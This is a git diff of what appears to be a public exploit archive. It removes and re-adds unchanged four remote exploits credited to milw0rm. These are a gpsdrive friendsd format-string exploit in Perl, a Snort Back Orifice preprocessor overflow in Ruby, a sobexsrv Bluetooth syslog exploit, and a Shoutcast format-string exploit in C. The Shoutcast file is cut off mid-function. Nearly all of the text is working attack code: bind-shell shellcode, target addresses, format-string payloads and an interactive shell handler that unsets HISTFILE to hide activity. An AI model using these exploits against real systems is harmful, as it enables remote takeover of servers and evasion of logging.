a/platforms/linux/remote/1291.pl b/platforms/linux/remote/1291.pl index 89760174b..ffbba0d79 100755 --- a/platforms/linux/remote/1291.pl +++ b/platforms/linux/remote/1291.pl @@ -1,111 +1,111 @@ -#!/usr/bin/perl -w -# -# Code by KF, although it is most likely ripped from John H. -# (kf_lists[at]digital_munition[dot]com) -# -# http://www.digitalmunition.com -# -# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. -# Free 14 day Testicle licking trial available! -# -# friendsd.c:367: fprintf (stderr, txt); -# -# Tested on intel using gpsdrive_2.09-2_i386.deb -# -# kfinisterre@animosity:~$ telnet localhost 5074 -# Trying 127.0.0.1... -# Connected to animosity -# Escape character is '^]'. -# id; -# uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre) -# : command not found -# -# s0t4ipv6@Shellcode.com.ar -# x86 portbind a shell in port 5074 -# 92 bytes. -# -# This shit is NOT robust and most likely will NOT work on kernel 2.6.12 -# because of the random address space. Find your own damn pointers to overwrite -# -$shellcode = "\x90" x 2 . -"\x31\xc0" . # xorl %eax,%eax -"\x50" . # pushl %eax -"\x40" . # incl %eax -"\x89\xc3" . # movl %eax,%ebx -"\x50" . # pushl %eax -"\x40" . # incl %eax -"\x50" . # pushl %eax -"\x89\xe1" . # movl %esp,%ecx -"\xb0\x66" . # movb $0x66,%al -"\xcd\x80" . # int $0x80 -"\x31\xd2" . # xorl %edx,%edx -"\x52" . # pushl %edx -"\x66\x68\x13\xd2" . # pushw $0xd213 -"\x43" . # incl %ebx -"\x66\x53" . # pushw %bx -"\x89\xe1" . # movl %esp,%ecx -"\x6a\x10" . # pushl $0x10 -"\x51" . # pushl %ecx -"\x50" . # pushl %eax -"\x89\xe1" . # movl %esp,%ecx -"\xb0\x66" . # movb $0x66,%al -"\xcd\x80" . # int $0x80 -"\x40" . # incl %eax -"\x89\x44\x24\x04" . # movl %eax,0x4(%esp,1) -"\x43" . # incl %ebx -"\x43" . # incl %ebx -"\xb0\x66" . # movb $0x66,%al -"\xcd\x80" . # int $0x80 -"\x83\xc4\x0c" . # addl $0xc,%esp -"\x52" . # pushl %edx -"\x52" . # pushl %edx -"\x43" . # incl %ebx -"\xb0\x66" . # movb $0x66,%al -"\xcd\x80" . # int $0x80 -"\x93" . # xchgl %eax,%ebx -"\x89\xd1" . # movl %edx,%ecx -"\xb0\x3f" . # movb $0x3f,%al -"\xcd\x80" . # int $0x80 -"\x41" . # incl %ecx -"\x80\xf9\x03" . # cmpb $0x3,%cl -"\x75\xf6" . # jnz -"\x52" . # pushl %edx -"\x68\x6e\x2f\x73\x68" . # pushl $0x68732f6e -"\x68\x2f\x2f\x62\x69" . # pushl $0x69622f2f -"\x89\xe3" . # movl %esp,%ebx -"\x52" . # pushl %edx -"\x53" . # pushl %ebx -"\x89\xe1" . # movl %esp,%ecx -"\xb0\x0b" . # movb $0xb,%al -"\xcd\x80"; # int $0x80 - -use Net::Friends; -use Data::Dumper; - -$name = 'GPSDRIVE-aaaa'; - -# 0804bb84 R_386_JUMP_SLOT recvfrom -$addy = "\x86\xbb\x04\x08"; # This is the write address. -$addy2 = "\x84\xbb\x04\x08"; - -#$retaddr = 0xbfffba7c; # Retaddr when using gdb -$retaddr = 0xbfffba8a; # Retaddr when NOT using gdb. Its that same kick you in the face styleee from the ppc sploit. - -$lo = ($retaddr >> 0) & 0xffff; -$hi = ($retaddr >> 16) & 0xffff; - -$hi = $hi - 0x4c; -$lo = (0x10000 + $lo) - $hi - 0x4c; - -$hi =1; $lo =1; - -$dir = "$addy$addy2%." . $hi . "d%379\$x%." . $lo . "d%380\$x$shellcode"; - -$friends = Net::Friends->new(shift || 'localhost'); -$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir); - -print Dumper($friends->query); - -# P.S. - I fart in the general direction of Fr-Sirt. - -# milw0rm.com [2005-11-04] +#!/usr/bin/perl -w +# +# Code by KF, although it is most likely ripped from John H. +# (kf_lists[at]digital_munition[dot]com) +# +# http://www.digitalmunition.com +# +# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. +# Free 14 day Testicle licking trial available! +# +# friendsd.c:367: fprintf (stderr, txt); +# +# Tested on intel using gpsdrive_2.09-2_i386.deb +# +# kfinisterre@animosity:~$ telnet localhost 5074 +# Trying 127.0.0.1... +# Connected to animosity +# Escape character is '^]'. +# id; +# uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre) +# : command not found +# +# s0t4ipv6@Shellcode.com.ar +# x86 portbind a shell in port 5074 +# 92 bytes. +# +# This shit is NOT robust and most likely will NOT work on kernel 2.6.12 +# because of the random address space. Find your own damn pointers to overwrite +# +$shellcode = "\x90" x 2 . +"\x31\xc0" . # xorl %eax,%eax +"\x50" . # pushl %eax +"\x40" . # incl %eax +"\x89\xc3" . # movl %eax,%ebx +"\x50" . # pushl %eax +"\x40" . # incl %eax +"\x50" . # pushl %eax +"\x89\xe1" . # movl %esp,%ecx +"\xb0\x66" . # movb $0x66,%al +"\xcd\x80" . # int $0x80 +"\x31\xd2" . # xorl %edx,%edx +"\x52" . # pushl %edx +"\x66\x68\x13\xd2" . # pushw $0xd213 +"\x43" . # incl %ebx +"\x66\x53" . # pushw %bx +"\x89\xe1" . # movl %esp,%ecx +"\x6a\x10" . # pushl $0x10 +"\x51" . # pushl %ecx +"\x50" . # pushl %eax +"\x89\xe1" . # movl %esp,%ecx +"\xb0\x66" . # movb $0x66,%al +"\xcd\x80" . # int $0x80 +"\x40" . # incl %eax +"\x89\x44\x24\x04" . # movl %eax,0x4(%esp,1) +"\x43" . # incl %ebx +"\x43" . # incl %ebx +"\xb0\x66" . # movb $0x66,%al +"\xcd\x80" . # int $0x80 +"\x83\xc4\x0c" . # addl $0xc,%esp +"\x52" . # pushl %edx +"\x52" . # pushl %edx +"\x43" . # incl %ebx +"\xb0\x66" . # movb $0x66,%al +"\xcd\x80" . # int $0x80 +"\x93" . # xchgl %eax,%ebx +"\x89\xd1" . # movl %edx,%ecx +"\xb0\x3f" . # movb $0x3f,%al +"\xcd\x80" . # int $0x80 +"\x41" . # incl %ecx +"\x80\xf9\x03" . # cmpb $0x3,%cl +"\x75\xf6" . # jnz +"\x52" . # pushl %edx +"\x68\x6e\x2f\x73\x68" . # pushl $0x68732f6e +"\x68\x2f\x2f\x62\x69" . # pushl $0x69622f2f +"\x89\xe3" . # movl %esp,%ebx +"\x52" . # pushl %edx +"\x53" . # pushl %ebx +"\x89\xe1" . # movl %esp,%ecx +"\xb0\x0b" . # movb $0xb,%al +"\xcd\x80"; # int $0x80 + +use Net::Friends; +use Data::Dumper; + +$name = 'GPSDRIVE-aaaa'; + +# 0804bb84 R_386_JUMP_SLOT recvfrom +$addy = "\x86\xbb\x04\x08"; # This is the write address. +$addy2 = "\x84\xbb\x04\x08"; + +#$retaddr = 0xbfffba7c; # Retaddr when using gdb +$retaddr = 0xbfffba8a; # Retaddr when NOT using gdb. Its that same kick you in the face styleee from the ppc sploit. + +$lo = ($retaddr >> 0) & 0xffff; +$hi = ($retaddr >> 16) & 0xffff; + +$hi = $hi - 0x4c; +$lo = (0x10000 + $lo) - $hi - 0x4c; + +$hi =1; $lo =1; + +$dir = "$addy$addy2%." . $hi . "d%379\$x%." . $lo . "d%380\$x$shellcode"; + +$friends = Net::Friends->new(shift || 'localhost'); +$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir); + +print Dumper($friends->query); + +# P.S. - I fart in the general direction of Fr-Sirt. + +# milw0rm.com [2005-11-04] diff --git a/platforms/linux/remote/1314.rb b/platforms/linux/remote/1314.rb index f00ce9b7f..8f35ea4ba 100755 --- a/platforms/linux/remote/1314.rb +++ b/platforms/linux/remote/1314.rb @@ -1,85 +1,85 @@ -#!/usr/bin/ruby -w - -# -# -# Version 0.1 (Public) -# -# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit -# -# by xwings at mysec dot org -# URL : http://www.mysec.org , somebody need to update the page -# -# Saying Hi to .... -# -# . All the 1337 c0d3r @ pulltheplug.org -# . Gurus from #rubylang @ freenode.net -# . Skywizard @ somewhere right now -# . HITBSecConf CREW and Team Panda -# -# 03:07 <@mark> hey xwings -# 03:07 <@mark> why don't you come up and see me sometime? -# -# Tested on : -# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux -# gcc version 3.3.5 (Debian 1:3.3.5-13) -# Snort 2.4.2 , ./configure && make && make install -# -# Use Ruby : http://www.ruby-lang.org -# -# -# - -require 'socket' - -fathost = ARGV[0] -packetsize = 1069 # ret is 1069 -targetport = 9080 - -boheader = "*!*QWTY?" + - [1096].pack("V") + # Length ,thanx Russell Sanford - "\xed\xac\xef\x0d"+ # ID - "\x01" # PING - -## Port Bind 3964 . connectback, refer to Russell Sanford's code - -shellcode = "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"+ - "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b"+ - "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52"+ - "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2"+ - "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58"+ - "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69"+ - "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81" - -filler = "\x90" * (packetsize-(boheader.length + shellcode.length)) - -retadd = [0xbffff370].pack('L') - - -darthcode = (shellcode+filler+retadd) - -def msrand(seed) - @holdrand = 31337 - end - -def mrand() - return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff) - end - -def bocrypt(takepayload) - - @arrpayload = (takepayload.split(//)) - - encpayload ="".to_s - @holdrand=0 - msrand(0) - - @arrpayload.each do |c| - encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr - end - - return encpayload - end - -UDPSocket.open.send(bocrypt(boheader+darthcode), 0, fathost, targetport) - -# milw0rm.com [2005-11-11] +#!/usr/bin/ruby -w + +# +# +# Version 0.1 (Public) +# +# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit +# +# by xwings at mysec dot org +# URL : http://www.mysec.org , somebody need to update the page +# +# Saying Hi to .... +# +# . All the 1337 c0d3r @ pulltheplug.org +# . Gurus from #rubylang @ freenode.net +# . Skywizard @ somewhere right now +# . HITBSecConf CREW and Team Panda +# +# 03:07 <@mark> hey xwings +# 03:07 <@mark> why don't you come up and see me sometime? +# +# Tested on : +# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux +# gcc version 3.3.5 (Debian 1:3.3.5-13) +# Snort 2.4.2 , ./configure && make && make install +# +# Use Ruby : http://www.ruby-lang.org +# +# +# + +require 'socket' + +fathost = ARGV[0] +packetsize = 1069 # ret is 1069 +targetport = 9080 + +boheader = "*!*QWTY?" + + [1096].pack("V") + # Length ,thanx Russell Sanford + "\xed\xac\xef\x0d"+ # ID + "\x01" # PING + +## Port Bind 3964 . connectback, refer to Russell Sanford's code + +shellcode = "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"+ + "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b"+ + "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52"+ + "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2"+ + "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58"+ + "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69"+ + "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81" + +filler = "\x90" * (packetsize-(boheader.length + shellcode.length)) + +retadd = [0xbffff370].pack('L') + + +darthcode = (shellcode+filler+retadd) + +def msrand(seed) + @holdrand = 31337 + end + +def mrand() + return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff) + end + +def bocrypt(takepayload) + + @arrpayload = (takepayload.split(//)) + + encpayload ="".to_s + @holdrand=0 + msrand(0) + + @arrpayload.each do |c| + encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr + end + + return encpayload + end + +UDPSocket.open.send(bocrypt(boheader+darthcode), 0, fathost, targetport) + +# milw0rm.com [2005-11-11] diff --git a/platforms/linux/remote/1355.pl b/platforms/linux/remote/1355.pl index d29bf4b01..d54bd6869 100755 --- a/platforms/linux/remote/1355.pl +++ b/platforms/linux/remote/1355.pl @@ -1,48 +1,48 @@ -#!/usr/bin/perl -# -# trifinite.group Bluetooth sobexsrv remote syslog() exploit -# code by kf_lists[at]digitalmunition[dot]com -# -# http://www.digitalmunition.com -# -# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude! -# Big ups to d4yj4y beeeeeeeeeeeeeotch! -# -$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents. - -# R_386_JUMP_SLOT exit() -$addy = "\x5a\x19\x05\x08"; -$addy2 = "\x58\x19\x05\x08"; - -$lo = ($retloc >> 0) & 0xffff; -$hi = ($retloc >> 16) & 0xffff; - -$hi = $hi - 0x38; -$lo = (0x10000 + $lo) - $hi - 0x38; - -#print "hi: $hi\n"; -#print "lo: $lo\n"; - -$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200; -#print $string . "\n"; - -$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35". -"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e". -"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56". -"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30". -"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56". -"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35". -"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a"; - -open(F, "> /tmp/shellcode") or die "can't open file"; -print F "$sc\n"; -close(F); - -system($string); - -# milw0rm.com [2005-12-03] +#!/usr/bin/perl +# +# trifinite.group Bluetooth sobexsrv remote syslog() exploit +# code by kf_lists[at]digitalmunition[dot]com +# +# http://www.digitalmunition.com +# +# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude! +# Big ups to d4yj4y beeeeeeeeeeeeeotch! +# +$retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents. + +# R_386_JUMP_SLOT exit() +$addy = "\x5a\x19\x05\x08"; +$addy2 = "\x58\x19\x05\x08"; + +$lo = ($retloc >> 0) & 0xffff; +$hi = ($retloc >> 16) & 0xffff; + +$hi = $hi - 0x38; +$lo = (0x10000 + $lo) - $hi - 0x38; + +#print "hi: $hi\n"; +#print "lo: $lo\n"; + +$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200; +#print $string . "\n"; + +$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35". +"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e". +"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56". +"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30". +"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56". +"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35". +"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a"; + +open(F, "> /tmp/shellcode") or die "can't open file"; +print F "$sc\n"; +close(F); + +system($string); + +# milw0rm.com [2005-12-03] diff --git a/platforms/linux/remote/1456.c b/platforms/linux/remote/1456.c index b390ee488..4e71337c5 100755 --- a/platforms/linux/remote/1456.c +++ b/platforms/linux/remote/1456.c @@ -1,369 +1,369 @@ -/* - * Shoutcast <= 1.9.4 exploit by crash-x - * Trys to upload the shellcode to a fixed address - * and execute it. - * - * This exploit was _not_ written bei Simon 'Zodiac' Moser (segfault.ch). - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define SHELL_PORT 7000 -#define SHELL_COMMAND "unset HISTFILE; uname -a; id;" - - -#if 1 -unsigned char shellcode[] = /* bindshell (7000) (Unknown) */ - "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6" - "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50" - "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a" - "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31" - "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0" - "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80" - "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" - "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; -#endif - - -struct targ{ - char *platform; - int retloc; - int retaddr; - int dpa_offset; - -} targets[]= { - { "Try to determine target", 0xdeadbabe, 0xdeadbabe, 123 }, - { "Shoutcast 1.9.4 all Linux distros", 0x0806493c, 0xdeadbabe, 2534 }, // dpa offset stolen from coki and tal0n's exploit - { "Shoutcast 1.9.2 all Linux distros", 0x0806c270, 0xdeadbabe, 2536 }, - { NULL } -}; - - -void usage(char *a){ - int i; - - printf("[-] Usage: %s -h [options]\n", a); - printf("[!] Options:\n"); - printf("\t\t-h\tHostname you want attack (required)\n"); - printf("\t\t-p\tPort of the shoutcast (default: 8000)\n"); - printf("\t\t-t\tTarget (default: 0)\n"); - printf("\t\t-s\tHow long to sleep before try connect to shell in s (default: 1)\n"); - printf("\t\t-S\tHow long to sleep before write the next byte of shellcode to the memory in ms (default: 7)\n"); - printf("[!] Targets:\n"); - for(i = 0; targets[i].platform; i++) - printf("\t\t%d\t %s\n", i, targets[i].platform); - exit(1); -} - - -int sockprintf(int sock, const char *s, ...){ - char *ptr; - int bytes; - va_list arg; - va_start(arg, s); - if(vasprintf(&ptr, s, arg) == -1){ -/* free(ptr); do'h shame on me */ - return -1; - } - va_end(arg); - - bytes = send(sock, ptr, strlen(ptr), 0); - free(ptr); - return bytes; -} - - -int resolv(struct sockaddr_in *addr, char *hostn){ - struct hostent *host; - - if (!inet_aton(hostn, &addr->sin_addr)){ - host = gethostbyname(hostn); - if (host == NULL){ - printf("[-] Wasnt able to resolve %s!\n", hostn); - return -1; - } - addr->sin_addr = *(struct in_addr*)host->h_addr; - } - return 0; -} - - -int conn(struct sockaddr_in addr, int port){ - int sock; - - if((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1){ - return -1; - } - - addr.sin_port = htons(port); - addr.sin_family = AF_INET; - - if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){ - return -1; - } - return sock; -} - - -int get_shell(struct sockaddr_in addr, int port, int sleeps){ - int sock; - char buffer[1024]; - fd_set fds; - - signal(SIGINT, SIG_IGN); - - sleep(sleeps); - - if((sock = conn(addr, port)) == -1) - return (-1); - printf("[+] Wooohooo we got a shell!\n"); - sockprintf(sock, SHELL_COMMAND"\r\n"); - while(1){ - FD_ZERO(&fds); - FD_SET(0, &fds); - FD_SET(sock, &fds); - - if (select(255, &fds, NULL, NULL, NULL) == -1){ - fprintf(stderr,"[-] sending failed\n"); - close(sock); - exit(1); - } - - memset(buffer, 0x0, sizeof(buffer)); - if (FD_ISSET(sock, &fds)){ - if (recv(sock, buffer, sizeof(buffer), 0) == -1){ - fprintf(stderr, "[-] Connection closed by remote host!\n"); - close(sock); - exit(1); - } - fprintf(stderr, "%s", buffer); - } - - if (FD_ISSET(0, &fds)){ - read(0, buffer, sizeof(buffer)); - write(sock, buffer, strlen(buffer)); - } - } - return 0; -} - - -void status(int i, int retloc){ - static int c=1; - - switch(c){ - case 1: - printf("[|] "); - break; - case 2: - printf("[/] "); - break; - case 3: - printf("[-] "); - break; - case 4: - printf("[\\] "); - c = 0; - break; - } - printf("Uploading shellcode[%d] to [%p]\r", i, (void *)retloc); - fflush(stdout); - c++; -} - - -int write_shellcode(struct sockaddr_in addr, int port, int target, int wsleeps){ - char buffer[1024]; - int retloc = ((0xc0000000) - 8 - strlen(shellcode)), i = 0, sock; - - targets[target].retaddr = retloc; - - for(i = 0; i < strlen(shellcode); i++, retloc++){ - if((sock = conn(addr, port)) == -1) - return -1; - - status(i, retloc); - - *((void **)(buffer)) = (void *)((retloc)); - buffer[4] = 0x0; - sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n", buffer); - - close(sock); - - if(shellcode[i] > 9) - snprintf(buffer, sizeof(buffer), "%%.%du%%%d$hn", shellcode[i], targets[target].dpa_offset); - else { - memset(buffer, 0x41, shellcode[i]); - snprintf(buffer + shellcode[i], sizeof(buffer), "%%%d$hn", targets[target].dpa_offset); - } - - if((sock = conn(addr, port)) == -1) - return -1; - - sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n", buffer); - close(sock); -// sleep(1); - usleep(wsleeps * 100000); - } - return 0; - -} - - -int get_target(struct sockaddr_in addr, int port){ - char buffer[1024], *ptr, *ptr2; - int sock, bytes; - - if((sock = conn(addr, port)) == -1){ - printf("failed!\r[-]\n"); - return -2; - } - printf("done!\n"); - - sockprintf(sock, "GET /doesntmatter HTTP/1.1\r\n\r\n"); - - if((bytes = recv(sock, buffer, sizeof(buffer)-1, 0)) == -1){ - printf("[-] Wasnt able to determine version of server, do it yourself!\n"); - return -1; - } - buffer[bytes] = 0x0; - - if(!(ptr = strstr(buffer, "
"))){ - printf("[-] Wasnt able to determine version of server, do it yourself!\n"); - return -1; - } - ptr += 4; - if(!(ptr2 = strstr(ptr, "
"))){ - printf("[-] Wasnt able to determine version of server, do it yourself!\n"); - return -1; - } - *ptr2 = 0x0; - - printf("[!] Version: %s\n", ptr); - - if(strstr(ptr, "Server/Linux v1.9.4")) - return 1; - else if(strstr(ptr, "Server/Linux v1.9.2")) - return 2; - else if(strstr(ptr, "Server/FreeBSD")){ - printf("[-] The server runs on FreeBSD, it could be FBSD 4.x or 5.x choose the target yourself!\n"); - return -1; - } else { - printf("[-] Wasnt able to find target for this server!\n"); - return -1; - } - - return -1; -} - - -int main(int argc, char **argv){ - char *hostn = NULL, buffer[1024]; - int i, sock, opt, target = 0, port = 8000, shell_port = SHELL_PORT, sleeps = 1, wsleeps = 7; - unsigned short ret1, ret2; - struct sockaddr_in addr; - - printf("[!] Shoutcast <= 1.9.4 exploit by crash-x\n"); - - if (argc < 2) - usage(argv[0]); - - while ((opt = getopt (argc, argv, "h:p:t:s:S:")) != -1){ - switch (opt){ - case 'h': - hostn = optarg; - break; - case 'p': - port = atoi(optarg); - if(port > 65535 || port < 1){ - printf("[-] Port %d is invalid\n",port); - return 1; - } - break; - case 't': - target = atoi(optarg); - for(i = 0; targets[i].platform; i++); - if(target >= i){ - printf("[-] Wtf are you trying to target?\n"); - usage(argv[0]); - } - break; - case 's': - sleeps = atoi(optarg); - break; - case 'S': - wsleeps = atoi(optarg); - break; - default: - usage(argv[0]); - } - } - - if(hostn == NULL) - usage(argv[0]); - - resolv(&addr, hostn); - - printf("[!] Connecting to target... "); - fflush(stdout); - if(target == 0){ - if((target = get_target(addr, port)) < 0) - return target; - } else - if(get_target(addr, port) == -2) - exit(-2); - - printf("[!] Targeting: %s\n", targets[target].platform); - - - if(write_shellcode(addr, port, target, wsleeps) != -1) - printf("[+]\n[+] Uploaded shellcode succesful\n"); - else { - printf("[-]\n[-] Wasn't able to upload shellcode, server probably crashed!\n"); - return -1; - } - - printf("[!] Writing retaddr [%p] to retloc [%p]\n", (void *)targets[target].retaddr, (void *)targets[target].retloc); - - - if((sock = conn(addr, port)) == -1){ - printf("[-] Connecting failed!\n"); - return -1; - } - memset(buffer, 0x0, sizeof(buffer)); - *((void **)(buffer)) = (void *)(targets[target].retloc); - *((void **)(buffer + 4)) = (void *)(targets[target].retloc + 2); - sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n", buffer); - close(sock); - - ret1 = (targets[target].retaddr & 0xffff0000) >> 16; - ret2 = (targets[target].retaddr & 0x0000ffff); - - snprintf(buffer, sizeof(buffer), "%%.%uu%%%d$hn%%.%uu%%%d$hn", - ret1, targets[target].dpa_offset + 1, (ret2 - ret1), targets[target].dpa_offset); - - if((sock = conn(addr, port)) == -1){ - printf("[-] Connecting failed!\n"); - return -1; - } - sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n", buffer); - - if(get_shell(addr, shell_port, sleeps) == -1){ - printf("[-] Exploit failed\n"); - return -1; - } - return 1; -} - -// milw0rm.com [2006-01-28] +/* + * Shoutcast <= 1.9.4 exploit by crash-x + * Trys to upload the shellcode to a fixed address + * and execute it. + * + * This exploit was _not_ written bei Simon 'Zodiac' Moser (segfault.ch). + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SHELL_PORT 7000 +#define SHELL_COMMAND "unset HISTFILE; uname -a; id;" + + +#if 1 +unsigned char shellcode[] = /* bindshell (7000) (Unknown) */ + "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6" + "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50" + "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a" + "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31" + "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0" + "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80" + "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" + "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; +#endif + + +struct targ{ + char *platform; + int retloc; + int retaddr; + int dpa_offset; + +} targets[]= { + { "Try to determine target", 0xdeadbabe, 0xdeadbabe, 123 }, + { "Shoutcast 1.9.4 all Linux distros", 0x0806493c, 0xdeadbabe, 2534 }, // dpa offset stolen from coki and tal0n's exploit + { "Shoutcast 1.9.2 all Linux distros", 0x0806c270, 0xdeadbabe, 2536 }, + { NULL } +}; + + +void usage(char *a){ + int i; + + printf("[-] Usage: %s -h [options]\n", a); + printf("[!] Options:\n"); + printf("\t\t-h\tHostname you want attack (required)\n"); + printf("\t\t-p\tPort of the shoutcast (default: 8000)\n"); + printf("\t\t-t\tTarget (default: 0)\n"); + printf("\t\t-s\tHow long to sleep before try connect to shell in s (default: 1)\n"); + printf("\t\t-S\tHow long to sleep before write the next byte of shellcode to the memory in ms (default: 7)\n"); + printf("[!] Targets:\n"); + for(i = 0; targets[i].platform; i++) + printf("\t\t%d\t %s\n", i, targets[i].platform); + exit(1); +} + + +int sockprintf(int sock, const char *s, ...){ + char *ptr; + int bytes; + va_list arg; + va_start(arg, s); + if(vasprintf(&ptr, s, arg) == -1){ +/* free(ptr); do'h shame on me */ + return -1; + } + va_end(arg); + + bytes = send(sock, ptr, strlen(ptr), 